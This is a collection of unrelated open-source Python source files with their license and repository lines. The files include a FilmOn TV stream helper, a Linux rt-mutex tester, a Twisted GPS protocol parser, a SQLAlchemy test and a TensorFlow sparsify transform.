if prms.has_key("next_playing") and len(prms["next_playing"]) > 0:
next_playing = prms["next_playing"]
startdatetime = int(next_playing["startdatetime"])
enddatetime = int(next_playing["enddatetime"])
description = next_playing["programme_description"]
programmename = next_playing["programme_name"]
image = None if not next_playing.has_key("images") or len(next_playing["images"]) == 0 or not next_playing["images"][0].has_key("url") else next_playing["images"][0]["url"]
tvGuide.append({"start": startdatetime, "end": enddatetime, "name": programmename.encode('utf-8'), "description": description.encode('utf-8'), "image": image})
return tvGuide
def GetChannelDetails(prms, chNum, referrerCh=None, ChName=None, filmonOldStrerams=False, useRtmp=False):
channelName = ""
channelDescription = ""
iconimage = 'http://static.filmon.com/couch/channels/{0}/extra_big_logo.png'.format(chNum)
url = None
tvGuide = []
if filmonOldStrerams:
url = GetFilmonOldStreram(prms['streams'], useHls=not useRtmp)
else:
url = prms["serverURL"]
if useRtmp:
url = hls2rtmp(url)
streamUrl = None if url is None else url.replace('low','high')
if referrerCh == None:
tvGuide = MakeChannelGuide(prms)
channelName = prms["title"].encode("utf-8")
else:
streamUrl = streamUrl.replace("{0}.".format(referrerCh), "{0}.".format(chNum))
channelName = ChName
return channelName, channelDescription, iconimage, streamUrl, tvGuide
def OpenURL(url, headers={}, user_data={}, justCookie=False):
if user_data:
user_data = urllib.urlencode(user_data)
req = urllib2.Request(url, user_data)
else:
req = urllib2.Request(url)
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0')
for k, v in headers.items():
req.add_header(k, v)
try:
response = urllib2.urlopen(req)
except:
return None
if justCookie == True:
if response.info().has_key("Set-Cookie"):
data = response.info()['Set-Cookie']
else:
data = None
else:
data = response.read()
response.close()
return data
def getCookie():
return OpenURL('http://www.filmon.com/tv/htmlmain', justCookie=True)
def getChannelHtml(cookie, chNum):
headers = {'X-Requested-With': 'XMLHttpRequest', 'Connection': 'Keep-Alive', 'Cookie': cookie}
user_data = {'channel_id': chNum}
return OpenURL('http://www.filmon.com/ajax/getChannelInfo', headers, user_data)
def GetChannelParams(html):
resultJSON = None
try:
resultJSON = json.loads(html)
if len(resultJSON) < 1 or not resultJSON.has_key("title"):
return None
except:
pass
return resultJSON
def GetChannelJson(chNum, filmonOldStrerams=False):
if filmonOldStrerams:
html = OpenURL("http://www.filmon.com/api/init/")
if html is None:
return None
resultJSON = json.loads(html)
session_key = resultJSON["session_key"]
html = OpenURL("http://www.filmon.com/api/channel/{0}?session_key={1}".format(chNum , session_key))
else:
cookie = getCookie()
if cookie == None:
return None
html = getChannelHtml(cookie, chNum)
return GetChannelParams(html)
def get_params(url):
param = []
params = url
if len(params) >= 2:
i = params.find('?')
if i == -1:
return param
params = params[i:]
cleanedparams = params.replace('?','')
if (params[len(params)-1] == '/'):
params = params[0:len(params)-2]
pairsofparams = cleanedparams.split('&')
param = {}
for i in range(len(pairsofparams)):
splitparams = {}
splitparams = pairsofparams[i].split('=')
if (len(splitparams)) == 2:
param[splitparams[0].lower()] = splitparams[1]
return param
def GetUrlParams(url):
params=get_params(url)
chNum = None
referrerCh = None
ChName = None
filmonMethod = None
try:
chNum = int(params["url"])
except:
pass
try:
referrerCh = int(params["referrerch"])
except:
pass
try:
ChName = str(params["chname"])
except:
pass
try:
filmonMethod = int(params["filmonmethod"])
except:
pass
return chNum, referrerCh, ChName, filmonMethod
def GetFilmonOldStreram(streams, useHls=False):
selectedStream = None
for stream in streams:
if stream ['quality'].lower() == "low":
selectedStream = stream
break
if selectedStream is not None:
streamUrl = selectedStream['url'] + '<'
streamName = selectedStream['name'].replace("low", "high")
if useHls:
regx = re.compile('rtmp://(.+?)\?id=(.+?)<')
match = regx.search(streamUrl)
return "http://{0}{1}/playlist.m3u8?id={2}".format(match.group(1), streamName, match.group(2))
if re.search('mp4', streamName, re.IGNORECASE):
regx = re.compile('rtmp://(.+?)/(.+?)/(.+?)/<')
match = regx.search(streamUrl)
app = '{0}/{1}/'.format(match.group(2), match.group(3))
swfUrl = 'http://www.filmon.com/tv/modules/FilmOnTV/files/flashapp/filmon/FilmonPlayer.swf'
url = "{0}{1}".format(selectedStream['url'], streamName)
if re.search('m4v', streamName, re.IGNORECASE):
app = 'vodlast'
swfUrl = 'http://www.filmon.com/tv/modules/FilmOnTV/files/flashapp/filmon/FilmonPlayer.swf'
url = "{0}/{1}".format(selectedStream['url'], streamName)
else:
try:
regx = re.compile('rtmp://(.+?)/live/(.+?)id=(.+?)<')
match = regx.search(streamUrl)
app = 'live/{0}id={1}'.format(match.group(2), match.group(3))
url = selectedStream['url']
swfUrl = 'http://www.filmon.com/tv/modules/FilmOnTV/files/flashapp/filmon/FilmonPlayer.swf'
except:
pass
try:
regx = re.compile('rtmp://(.+?)/(.+?)id=(.+?)"')
match = regx.search(streamUrl)
app = '{0}id={1}'.format(match.group(2), match.group(3))
swfUrl = 'http://www.filmon.com/tv/modules/FilmOnTV/files/flashapp/filmon/FilmonPlayer.swf?v=28'
except:
pass
try:
regx = re.compile('rtmp://(.+?)/(.+?)/<')
match = regx.search(streamUrl)
app = '{0}/'.format(match.group(2))
url = "{0}/{1}".format(selectedStream['url'], streamName)
swfUrl = 'http://www.filmon.com/tv/modules/FilmOnTV/files/flashapp/filmon/FilmonPlayer.swf'
except:
pass
tcUrl = selectedStream['url']
url = "{0} playpath={1} app={2} swfUrl={3} tcUrl={4} pageurl=http://www.filmon.com/ live=true timeout=45 swfVfy=true".format(url, streamName, app, swfUrl, tcUrl)
return url
def hls2rtmp(urlhls):
url2 = urlhls.split('/')
urlrtmp = "rtmp://%s/live/%s" % (url2[2],url2[5].replace('playlist.m3u8',''))
playpath = url2[4].replace('.l.stream', '.low.stream').replace('.lo.stream', '.low.stream')
swfUrl = 'http://www.filmon.com/tv/modules/FilmOnTV/files/flashapp/filmon/FilmonPlayer.swf'
urlrtmp = "{0}/{1} playpath={1} swfUrl={2} pageUrl=http://www.filmon.com/ live=true timeout=45 swfVfy=true".format(urlrtmp, playpath, swfUrl)
return urlrtmp
def GetFilmonChannelsList():
list = []
try:
list1 = common.GetListFromPlx(includeCatNames=False, fullScan=True)
for item in list1:
if item["type"] == 'video':
url = item['url']
if url.find(AddonID) > 0:
channel = re.compile('url=([0-9]*).*?mode=1(.*?)$',re.I+re.M+re.U+re.S).findall(url)
if len(channel) > 0 and channel[0][0] != "" and channel[0][1].find("&ignorefilmonguide=1") < 0:
list.append({"channel": int(channel[0][0]), "name": item["name"]})
except:
pass
return list
def MakePLXguide(filmonGuideFile):
filmonlist = GetFilmonChannelsList()
if filmonlist == []:
return False
randList = [{ "index": filmonlist.index(item), "channel": item["channel"]} for item in filmonlist]
random.seed()
random.shuffle(randList)
#cookie = OpenURL('http://www.filmon.com/tv/htmlmain', justCookie=True)
#if cookie == None:
# return
html = OpenURL("http://www.filmon.com/api/init/")
if html is None:
return False
resultJSON = json.loads(html)
session_key = resultJSON["session_key"]
for item in randList:
prms = None
#html = getChannelHtml(cookie, item["channel"])
html = OpenURL("http://www.filmon.com/api/channel/{0}?session_key={1}".format(item["channel"] , session_key))
if html is not None:
prms = GetChannelParams(html)
tvGuide = [] if prms is None else MakeChannelGuide(prms)
filmonlist[item["index"]] = {"channel": filmonlist[item["index"]]["name"], "tvGuide": tvGuide}
with open(filmonGuideFile, 'w') as outfile:
json.dump(filmonlist, outfile)
outfile.close()
return True
|
gpl-2.0
|
sadleader/odoo
|
addons/resource/faces/observer.py
|
433
|
2328
|
#@+leo-ver=4
#@+node:@file observer.py
#@@language python
#@<< Copyright >>
#@+node:<< Copyright >>
############################################################################
# Copyright (C) 2005, 2006, 2007, 2008 by Reithinger GmbH
# [email protected]
#
# This file is part of faces.
#
# faces is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# faces is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
############################################################################
#@-node:<< Copyright >>
#@nl
"""
This module contains the base class for all observer objects
"""
#@<< Imports >>
#@+node:<< Imports >>
#@-node:<< Imports >>
#@nl
_is_source_ = True
#@+others
#@+node:class Observer
class Observer(object):
"""
Base Class for all charts and reports.
@var visible: Specifies if the observer is visible
at the navigation bar inside the gui.
@var link_view: syncronizes the marked objects in all views.
"""
#@ << declarations >>
#@+node:<< declarations >>
__type_name__ = None
__type_image__ = None
visible = True
link_view = True
__attrib_completions__ = { "visible" : 'visible = False',
"link_view" : "link_view = False" }
#@-node:<< declarations >>
#@nl
#@ @+others
#@+node:register_editors
def register_editors(cls, registry):
pass
register_editors = classmethod(register_editors)
#@-node:register_editors
#@-others
#@-node:class Observer
#@-others
factories = { }
clear_cache_funcs = {}
#@-node:@file observer.py
#@-leo
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
wisechengyi/pants
|
src/python/pants/engine/legacy_engine.py
|
1
|
1345
|
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from abc import ABC, abstractmethod
from pants.base.exceptions import TaskError
class Engine(ABC):
"""An engine for running a pants command line."""
def execute(self, context, goals):
"""Executes the supplied goals and their dependencies against the given context.
:param context: The pants run context.
:param list goals: A list of ``Goal`` objects representing the command line goals explicitly
requested.
:returns int: An exit code of 0 upon success and non-zero otherwise.
"""
try:
self.attempt(context, goals)
return 0
except TaskError as e:
message = str(e)
if message:
print("\nFAILURE: {0}\n".format(message))
else:
print("\nFAILURE\n")
return e.exit_code
@abstractmethod
def attempt(self, context, goals):
"""Given the target context and command line goals, attempt to achieve all goals.
:param context: The pants run context.
:param list goals: A list of ``Goal`` objects representing the command line goals explicitly
requested.
"""
|
apache-2.0
|
erik96/Linux-Kernel-3.4
|
scripts/rt-tester/rt-tester.py
|
11005
|
5307
|
#!/usr/bin/python
#
# rt-mutex tester
#
# (C) 2006 Thomas Gleixner <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
import os
import sys
import getopt
import shutil
import string
# Globals
quiet = 0
test = 0
comments = 0
sysfsprefix = "/sys/devices/system/rttest/rttest"
statusfile = "/status"
commandfile = "/command"
# Command opcodes
cmd_opcodes = {
"schedother" : "1",
"schedfifo" : "2",
"lock" : "3",
"locknowait" : "4",
"lockint" : "5",
"lockintnowait" : "6",
"lockcont" : "7",
"unlock" : "8",
"signal" : "11",
"resetevent" : "98",
"reset" : "99",
}
test_opcodes = {
"prioeq" : ["P" , "eq" , None],
"priolt" : ["P" , "lt" , None],
"priogt" : ["P" , "gt" , None],
"nprioeq" : ["N" , "eq" , None],
"npriolt" : ["N" , "lt" , None],
"npriogt" : ["N" , "gt" , None],
"unlocked" : ["M" , "eq" , 0],
"trylock" : ["M" , "eq" , 1],
"blocked" : ["M" , "eq" , 2],
"blockedwake" : ["M" , "eq" , 3],
"locked" : ["M" , "eq" , 4],
"opcodeeq" : ["O" , "eq" , None],
"opcodelt" : ["O" , "lt" , None],
"opcodegt" : ["O" , "gt" , None],
"eventeq" : ["E" , "eq" , None],
"eventlt" : ["E" , "lt" , None],
"eventgt" : ["E" , "gt" , None],
}
# Print usage information
def usage():
print "rt-tester.py <-c -h -q -t> <testfile>"
print " -c display comments after first command"
print " -h help"
print " -q quiet mode"
print " -t test mode (syntax check)"
print " testfile: read test specification from testfile"
print " otherwise from stdin"
return
# Print progress when not in quiet mode
def progress(str):
if not quiet:
print str
# Analyse a status value
def analyse(val, top, arg):
intval = int(val)
if top[0] == "M":
intval = intval / (10 ** int(arg))
intval = intval % 10
argval = top[2]
elif top[0] == "O":
argval = int(cmd_opcodes.get(arg, arg))
else:
argval = int(arg)
# progress("%d %s %d" %(intval, top[1], argval))
if top[1] == "eq" and intval == argval:
return 1
if top[1] == "lt" and intval < argval:
return 1
if top[1] == "gt" and intval > argval:
return 1
return 0
# Parse the commandline
try:
(options, arguments) = getopt.getopt(sys.argv[1:],'chqt')
except getopt.GetoptError, ex:
usage()
sys.exit(1)
# Parse commandline options
for option, value in options:
if option == "-c":
comments = 1
elif option == "-q":
quiet = 1
elif option == "-t":
test = 1
elif option == '-h':
usage()
sys.exit(0)
# Select the input source
if arguments:
try:
fd = open(arguments[0])
except Exception,ex:
sys.stderr.write("File not found %s\n" %(arguments[0]))
sys.exit(1)
else:
fd = sys.stdin
linenr = 0
# Read the test patterns
while 1:
linenr = linenr + 1
line = fd.readline()
if not len(line):
break
line = line.strip()
parts = line.split(":")
if not parts or len(parts) < 1:
continue
if len(parts[0]) == 0:
continue
if parts[0].startswith("#"):
if comments > 1:
progress(line)
continue
if comments == 1:
comments = 2
progress(line)
cmd = parts[0].strip().lower()
opc = parts[1].strip().lower()
tid = parts[2].strip()
dat = parts[3].strip()
try:
# Test or wait for a status value
if cmd == "t" or cmd == "w":
testop = test_opcodes[opc]
fname = "%s%s%s" %(sysfsprefix, tid, statusfile)
if test:
print fname
continue
while 1:
query = 1
fsta = open(fname, 'r')
status = fsta.readline().strip()
fsta.close()
stat = status.split(",")
for s in stat:
s = s.strip()
if s.startswith(testop[0]):
# Separate status value
val = s[2:].strip()
query = analyse(val, testop, dat)
break
if query or cmd == "t":
break
progress(" " + status)
if not query:
sys.stderr.write("Test failed in line %d\n" %(linenr))
sys.exit(1)
# Issue a command to the tester
elif cmd == "c":
cmdnr = cmd_opcodes[opc]
# Build command string and sys filename
cmdstr = "%s:%s" %(cmdnr, dat)
fname = "%s%s%s" %(sysfsprefix, tid, commandfile)
if test:
print fname
continue
fcmd = open(fname, 'w')
fcmd.write(cmdstr)
fcmd.close()
except Exception,ex:
sys.stderr.write(str(ex))
sys.stderr.write("\nSyntax error in line %d\n" %(linenr))
if not test:
fd.close()
sys.exit(1)
# Normal exit pass
print "Pass"
sys.exit(0)
|
gpl-2.0
|
dya2/python-for-android
|
python-modules/twisted/twisted/protocols/gps/rockwell.py
|
61
|
11638
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
"""Rockwell Semiconductor Zodiac Serial Protocol
Coded from official protocol specs (Order No. GPS-25, 09/24/1996, Revision 11)
Maintainer: Bob Ippolito
The following Rockwell Zodiac messages are currently understood::
EARTHA\\r\\n (a hack to "turn on" a DeLorme Earthmate)
1000 (Geodesic Position Status Output)
1002 (Channel Summary)
1003 (Visible Satellites)
1011 (Receiver ID)
The following Rockwell Zodiac messages require implementation::
None really, the others aren't quite so useful and require bidirectional communication w/ the device
Other desired features::
- Compatability with the DeLorme Tripmate and other devices with this chipset (?)
"""
import struct, operator, math
from twisted.internet import protocol
from twisted.python import log
DEBUG = 1
class ZodiacParseError(ValueError):
pass
class Zodiac(protocol.Protocol):
dispatch = {
# Output Messages (* means they get sent by the receiver by default periodically)
1000: 'fix', # *Geodesic Position Status Output
1001: 'ecef', # ECEF Position Status Output
1002: 'channels', # *Channel Summary
1003: 'satellites', # *Visible Satellites
1005: 'dgps', # Differential GPS Status
1007: 'channelmeas', # Channel Measurement
1011: 'id', # *Receiver ID
1012: 'usersettings', # User-Settings Output
1100: 'testresults', # Built-In Test Results
1102: 'meastimemark', # Measurement Time Mark
1108: 'utctimemark', # UTC Time Mark Pulse Output
1130: 'serial', # Serial Port Communication Parameters In Use
1135: 'eepromupdate', # EEPROM Update
1136: 'eepromstatus', # EEPROM Status
}
# these aren't used for anything yet, just sitting here for reference
messages = {
# Input Messages
'fix': 1200, # Geodesic Position and Velocity Initialization
'udatum': 1210, # User-Defined Datum Definition
'mdatum': 1211, # Map Datum Select
'smask': 1212, # Satellite Elevation Mask Control
'sselect': 1213, # Satellite Candidate Select
'dgpsc': 1214, # Differential GPS Control
'startc': 1216, # Cold Start Control
'svalid': 1217, # Solution Validity Control
'antenna': 1218, # Antenna Type Select
'altinput': 1219, # User-Entered Altitude Input
'appctl': 1220, # Application Platform Control
'navcfg': 1221, # Nav Configuration
'test': 1300, # Perform Built-In Test Command
'restart': 1303, # Restart Command
'serial': 1330, # Serial Port Communications Parameters
'msgctl': 1331, # Message Protocol Control
'dgpsd': 1351, # Raw DGPS RTCM SC-104 Data
}
MAX_LENGTH = 296
allow_earthmate_hack = 1
recvd = ""
def dataReceived(self, recd):
self.recvd = self.recvd + recd
while len(self.recvd) >= 10:
# hack for DeLorme EarthMate
if self.recvd[:8] == 'EARTHA\r\n':
if self.allow_earthmate_hack:
self.allow_earthmate_hack = 0
self.transport.write('EARTHA\r\n')
self.recvd = self.recvd[8:]
continue
if self.recvd[0:2] != '\xFF\x81':
if DEBUG:
raise ZodiacParseError('Invalid Sync %r' % self.recvd)
else:
raise ZodiacParseError
sync, msg_id, length, acknak, checksum = struct.unpack('<HHHHh', self.recvd[:10])
# verify checksum
cksum = -(reduce(operator.add, (sync, msg_id, length, acknak)) & 0xFFFF)
cksum, = struct.unpack('<h', struct.pack('<h', cksum))
if cksum != checksum:
if DEBUG:
raise ZodiacParseError('Invalid Header Checksum %r != %r %r' % (checksum, cksum, self.recvd[:8]))
else:
raise ZodiacParseError
# length was in words, now it's bytes
length = length * 2
# do we need more data ?
neededBytes = 10
if length:
neededBytes += length + 2
if len(self.recvd) < neededBytes:
break
if neededBytes > self.MAX_LENGTH:
raise ZodiacParseError("Invalid Header??")
# empty messages pass empty strings
message = ''
# does this message have data ?
if length:
message, checksum = self.recvd[10:10+length], struct.unpack('<h', self.recvd[10+length:neededBytes])[0]
cksum = 0x10000 - (reduce(operator.add, struct.unpack('<%dH' % (length/2), message)) & 0xFFFF)
cksum, = struct.unpack('<h', struct.pack('<h', cksum))
if cksum != checksum:
if DEBUG:
log.dmsg('msg_id = %r length = %r' % (msg_id, length), debug=True)
raise ZodiacParseError('Invalid Data Checksum %r != %r %r' % (checksum, cksum, message))
else:
raise ZodiacParseError
# discard used buffer, dispatch message
self.recvd = self.recvd[neededBytes:]
self.receivedMessage(msg_id, message, acknak)
def receivedMessage(self, msg_id, message, acknak):
dispatch = self.dispatch.get(msg_id, None)
if not dispatch:
raise ZodiacParseError('Unknown msg_id = %r' % msg_id)
handler = getattr(self, 'handle_%s' % dispatch, None)
decoder = getattr(self, 'decode_%s' % dispatch, None)
if not (handler and decoder):
# missing handler or decoder
#if DEBUG:
# log.msg('MISSING HANDLER/DECODER PAIR FOR: %r' % (dispatch,), debug=True)
return
decoded = decoder(message)
return handler(*decoded)
def decode_fix(self, message):
assert len(message) == 98, "Geodesic Position Status Output should be 55 words total (98 byte message)"
(ticks, msgseq, satseq, navstatus, navtype, nmeasure, polar, gpswk, gpses, gpsns, utcdy, utcmo, utcyr, utchr, utcmn, utcsc, utcns, latitude, longitude, height, geoidalsep, speed, course, magvar, climb, mapdatum, exhposerr, exvposerr, extimeerr, exphvelerr, clkbias, clkbiasdev, clkdrift, clkdriftdev) = struct.unpack('<LhhHHHHHLLHHHHHHLlllhLHhhHLLLHllll', message)
# there's a lot of shit in here..
# I'll just snag the important stuff and spit it out like my NMEA decoder
utc = (utchr * 3600.0) + (utcmn * 60.0) + utcsc + (float(utcns) * 0.000000001)
log.msg('utchr, utcmn, utcsc, utcns = ' + repr((utchr, utcmn, utcsc, utcns)), debug=True)
latitude = float(latitude) * 0.00000180 / math.pi
longitude = float(longitude) * 0.00000180 / math.pi
posfix = not (navstatus & 0x001c)
satellites = nmeasure
hdop = float(exhposerr) * 0.01
altitude = float(height) * 0.01, 'M'
geoid = float(geoidalsep) * 0.01, 'M'
dgps = None
return (
# seconds since 00:00 UTC
utc,
# latitude (degrees)
latitude,
# longitude (degrees)
longitude,
# position fix status (invalid = False, valid = True)
posfix,
# number of satellites [measurements] used for fix 0 <= satellites <= 12
satellites,
# horizontal dilution of precision
hdop,
# (altitude according to WGS-84 ellipsoid, units (always 'M' for meters))
altitude,
# (geoid separation according to WGS-84 ellipsoid, units (always 'M' for meters))
geoid,
# None, for compatability w/ NMEA code
dgps,
)
def decode_id(self, message):
assert len(message) == 106, "Receiver ID Message should be 59 words total (106 byte message)"
ticks, msgseq, channels, software_version, software_date, options_list, reserved = struct.unpack('<Lh20s20s20s20s20s', message)
channels, software_version, software_date, options_list = map(lambda s: s.split('\0')[0], (channels, software_version, software_date, options_list))
software_version = float(software_version)
channels = int(channels) # 0-12 .. but ALWAYS 12, so we ignore.
options_list = int(options_list[:4], 16) # only two bitflags, others are reserved
minimize_rom = (options_list & 0x01) > 0
minimize_ram = (options_list & 0x02) > 0
# (version info), (options info)
return ((software_version, software_date), (minimize_rom, minimize_ram))
def decode_channels(self, message):
assert len(message) == 90, "Channel Summary Message should be 51 words total (90 byte message)"
ticks, msgseq, satseq, gpswk, gpsws, gpsns = struct.unpack('<LhhHLL', message[:18])
channels = []
message = message[18:]
for i in range(12):
flags, prn, cno = struct.unpack('<HHH', message[6 * i:6 * (i + 1)])
# measurement used, ephemeris available, measurement valid, dgps corrections available
flags = (flags & 0x01, flags & 0x02, flags & 0x04, flags & 0x08)
channels.append((flags, prn, cno))
# ((flags, satellite PRN, C/No in dbHz)) for 12 channels
# satellite message sequence number
# gps week number, gps seconds in week (??), gps nanoseconds from Epoch
return (tuple(channels),) #, satseq, (gpswk, gpsws, gpsns))
def decode_satellites(self, message):
assert len(message) == 90, "Visible Satellites Message should be 51 words total (90 byte message)"
ticks, msgseq, gdop, pdop, hdop, vdop, tdop, numsatellites = struct.unpack('<LhhhhhhH', message[:18])
gdop, pdop, hdop, vdop, tdop = map(lambda n: float(n) * 0.01, (gdop, pdop, hdop, vdop, tdop))
satellites = []
message = message[18:]
for i in range(numsatellites):
prn, azi, elev = struct.unpack('<Hhh', message[6 * i:6 * (i + 1)])
azi, elev = map(lambda n: (float(n) * 0.0180 / math.pi), (azi, elev))
satellites.push((prn, azi, elev))
# ((PRN [0, 32], azimuth +=[0.0, 180.0] deg, elevation +-[0.0, 90.0] deg)) satellite info (0-12)
# (geometric, position, horizontal, vertical, time) dilution of precision
return (tuple(satellites), (gdop, pdop, hdop, vdop, tdop))
def decode_dgps(self, message):
assert len(message) == 38, "Differential GPS Status Message should be 25 words total (38 byte message)"
raise NotImplementedError
def decode_ecef(self, message):
assert len(message) == 96, "ECEF Position Status Output Message should be 54 words total (96 byte message)"
raise NotImplementedError
def decode_channelmeas(self, message):
assert len(message) == 296, "Channel Measurement Message should be 154 words total (296 byte message)"
raise NotImplementedError
def decode_usersettings(self, message):
assert len(message) == 32, "User-Settings Output Message should be 22 words total (32 byte message)"
raise NotImplementedError
def decode_testresults(self, message):
assert len(message) == 28, "Built-In Test Results Message should be 20 words total (28 byte message)"
raise NotImplementedError
def decode_meastimemark(self, message):
assert len(message) == 494, "Measurement Time Mark Message should be 253 words total (494 byte message)"
raise NotImplementedError
def decode_utctimemark(self, message):
assert len(message) == 28, "UTC Time Mark Pulse Output Message should be 20 words total (28 byte message)"
raise NotImplementedError
def decode_serial(self, message):
assert len(message) == 30, "Serial Port Communication Paramaters In Use Message should be 21 words total (30 byte message)"
raise NotImplementedError
def decode_eepromupdate(self, message):
assert len(message) == 8, "EEPROM Update Message should be 10 words total (8 byte message)"
raise NotImplementedError
def decode_eepromstatus(self, message):
assert len(message) == 24, "EEPROM Status Message should be 18 words total (24 byte message)"
raise NotImplementedError
|
apache-2.0
|
hernandito/SickRage
|
lib/sqlalchemy/testing/suite/test_update_delete.py
|
76
|
1578
|
from .. import fixtures, config
from ..assertions import eq_
from sqlalchemy import Integer, String
from ..schema import Table, Column
class SimpleUpdateDeleteTest(fixtures.TablesTest):
run_deletes = 'each'
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table('plain_pk', metadata,
Column('id', Integer, primary_key=True),
Column('data', String(50))
)
@classmethod
def insert_data(cls):
config.db.execute(
cls.tables.plain_pk.insert(),
[
{"id":1, "data":"d1"},
{"id":2, "data":"d2"},
{"id":3, "data":"d3"},
]
)
def test_update(self):
t = self.tables.plain_pk
r = config.db.execute(
t.update().where(t.c.id == 2),
data="d2_new"
)
assert not r.is_insert
assert not r.returns_rows
eq_(
config.db.execute(t.select().order_by(t.c.id)).fetchall(),
[
(1, "d1"),
(2, "d2_new"),
(3, "d3")
]
)
def test_delete(self):
t = self.tables.plain_pk
r = config.db.execute(
t.delete().where(t.c.id == 2)
)
assert not r.is_insert
assert not r.returns_rows
eq_(
config.db.execute(t.select().order_by(t.c.id)).fetchall(),
[
(1, "d1"),
(3, "d3")
]
)
__all__ = ('SimpleUpdateDeleteTest', )
|
gpl-3.0
|
grantkinsler/motifproject
|
motifcompetesim_initialconditions/motifcompetesimtracker_trial.py
|
1
|
1653
|
from motifcompetesimtracker_cell import Cell
from motifcompetesimtracker_population import Population
import random as rand
from copy import deepcopy
from copy import copy
def motifcompetesim_trial(celllist,elonglist,motiflist,max_strand_nr,maxStrandLength,numCells,numRounds,elong,biaslist):
population = Population([],motiflist,'empty','empty','empty')
population.populate(numCells,motiflist,max_strand_nr)
population.initial_condition_populate(celllist,elonglist,motiflist,max_strand_nr)
# counter lists
nr_motifs = []
nr_cells_with_motif = []
for iterator in xrange(len(motiflist)):
nr_motifs.append([])
nr_cells_with_motif.append([])
nr_strands_used = []
population_tracker = []
elongation_tracker = []
for time in xrange(numRounds):
for cell_iterator in xrange(numCells):
population.cells[cell_iterator].grow(elong,biaslist,maxStrandLength)
cell_to_divide = rand.sample(range(numCells),1)[0]
new_cell = population.cells[cell_to_divide].divide()
population.cells.append(new_cell)
population.cells = rand.sample(population.cells,numCells)
population.update_counters()
for index in xrange(len(motiflist)):
nr_motifs[index].append(copy(population.nr_motifs[index]))
nr_cells_with_motif[index].append(copy(population.nr_cells_with_motif[index]))
nr_strands_used.append(copy(population.nr_strands))
population_tracker_temp, elongation_tracker_temp = population.returncontents()
population_tracker.append(deepcopy(population_tracker_temp))
elongation_tracker.append(deepcopy(elongation_tracker_temp))
return nr_motifs, nr_strands_used, nr_cells_with_motif, population_tracker, elongation_tracker
|
mit
|
rvalyi/OpenUpgrade
|
addons/claim_from_delivery/__init__.py
|
374
|
1053
|
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import stock_picking
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
laosiaudi/tensorflow
|
tensorflow/contrib/learn/python/learn/dataframe/transforms/sparsify.py
|
76
|
2727
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Transforms Dense to Sparse Tensor."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.learn.python.learn.dataframe import transform
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
class Sparsify(transform.TensorFlowTransform):
"""Transforms Dense to Sparse Tensor."""
def __init__(self, strip_value):
super(Sparsify, self).__init__()
self._strip_value = strip_value
@transform.parameter
def strip_value(self):
return self._strip_value
@property
def name(self):
return "Sparsify"
@property
def input_valency(self):
return 1
@property
def _output_names(self):
return "output",
def _apply_transform(self, input_tensors, **kwargs):
"""Applies the transformation to the `transform_input`.
Args:
input_tensors: a list of Tensors representing the input to
the Transform.
**kwargs: Additional keyword arguments, unused here.
Returns:
A namedtuple of Tensors representing the transformed output.
"""
d = input_tensors[0]
if self.strip_value is np.nan:
strip_hot = math_ops.is_nan(d)
else:
strip_hot = math_ops.equal(d,
array_ops.constant([self.strip_value],
dtype=d.dtype))
keep_hot = math_ops.logical_not(strip_hot)
length = array_ops.reshape(array_ops.shape(d), [])
indices = array_ops.boolean_mask(math_ops.range(length), keep_hot)
values = array_ops.boolean_mask(d, keep_hot)
sparse_indices = array_ops.reshape(
math_ops.cast(indices, dtypes.int64), [-1, 1])
shape = math_ops.cast(array_ops.shape(d), dtypes.int64)
# pylint: disable=not-callable
return self.return_type(
sparse_tensor.SparseTensor(sparse_indices, values, shape))
|
apache-2.0
|
2013Commons/HUE-SHARK
|
desktop/core/src/desktop/management/commands/runspawningserver.py
|
2
|
4667
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
